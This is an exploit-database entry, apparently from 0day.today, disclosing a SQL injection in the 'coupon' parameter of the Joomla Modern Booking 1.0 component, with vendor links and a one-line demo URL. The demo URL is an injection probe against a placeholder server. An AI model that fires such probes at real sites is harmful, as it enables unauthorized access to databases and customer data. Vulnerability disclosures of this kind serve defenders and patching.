id: 27408
date: 03/23/2017
title: Joomla Modern Booking 1.0 Component - coupon Parameter SQL Injection Vulnerability
author: Hamed Izadi
cves: 

###############################################################################################
# Exploit Title: Joomla Modern Booking  - SQL Injection
 
               # Author: [ Hamed Izadi ]
 
                        #IRAN
 
# Vendor Homepage :
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/modern-booking/
# Vendor Homepage : https://www.unikalus.com/
# Category: [ Webapps ]
# Tested on: [ Ubuntu ]
# Versions: 1.0
# Date: March 22, 2017
 
 
# PoC:
# coupon Parameter Vulnerable To SQLi
 
# Demo:
# https://server/modern-booking-slots?task=saveorder&coupon=test"&start=&option=com_modern_booking

#  0day.today [2023-03-23]  #